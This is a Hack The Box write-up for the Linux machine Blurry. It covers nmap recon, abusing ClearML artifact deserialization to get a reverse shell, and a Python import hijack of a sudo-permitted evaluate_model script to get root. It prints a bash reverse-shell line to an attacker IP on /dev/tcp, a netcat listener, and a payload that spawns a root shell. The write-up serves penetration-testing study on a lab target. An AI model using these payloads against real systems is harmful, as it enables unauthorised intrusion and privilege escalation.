> m4rt@CTF_ARCHIVE:~$

Hack The Box / LINUX / 2026-03-27

Hack The Box - Blurry (Linux)

ClearML artifact deserialization abuse grants shell as jippity, then writable model path and Python import hijack in evaluate_model lead to root.

Target

  • IP: 10.10.11.19

Recon

sudo nmap -sC -sV 10.10.11.19 -p- -T5 -v

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
|   3072 3e:21:d5:dc:2e:61:eb:8f:a6:3b:24:2a:b7:1c:05:d3 (RSA)
|   256 39:11:42:3f:0c:25:00:08:d7:2f:1b:51:e0:43:9d:85 (ECDSA)
|_  256 b0:6f:a0:0a:9e:df:b1:7a:49:78:86:b2:35:40:ec:95 (ED25519)
80/tcp open  http    nginx 1.18.0
|_http-title: Did not follow redirect to http://app.blurry.htb/
|_http-server-header: nginx/1.18.0
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add these hosts to /etc/hosts:

  • app.blurry.htb
  • api.blurry.htb
  • files.blurry.htb

ClearML Setup

Browse to http://app.blurry.htb/.

The application is ClearML. Log in with any username (for example test12).

Go to profile settings, workspace, and add credentials. Copy the generated ClearML configuration.

pip install clearml
clearml-init

Paste the copied configuration when prompted.

Reference:

  • https://hiddenlayer.com/research/not-so-clear-how-mlops-solutions-can-muddy-the-waters-of-your-supply-chain/

Initial Access via Malicious Artifact

In project Black Swan, user Chad Jippity periodically runs a task that retrieves artifacts from tasks tagged review.

Create a task in that project with tag review and a malicious artifact object.

Create file rev:

bash -i >& /dev/tcp/10.10.16.43/4444 0>&1

Start listener and HTTP server:

nc -vlnp 4444
python3 -m http.server 80

Run exploit script:

  • exp.py
python3 exp.py

We get a reverse shell as jippity.

Stable User Access

ssh-keygen -f jippity

Add public key to authorized_keys, then connect:

ssh jippity@blurry.htb -i jippity

Privilege Escalation

sudo -l

Matching Defaults entries for jippity on blurry:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jippity may run the following commands on blurry:
    (root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth

file /usr/bin/evaluate_model

Shell script

/models is writable by jippity.

Create a .pth model file:

python3

import torch
import torchvision
model = torchvision.models.resnet18()
torch.save(model, 'test.pth')

Create evaluate_model.py with:

import os
os.system('bash')

Run privileged script:

sudo /usr/bin/evaluate_model /models/test.pth

We get a root shell.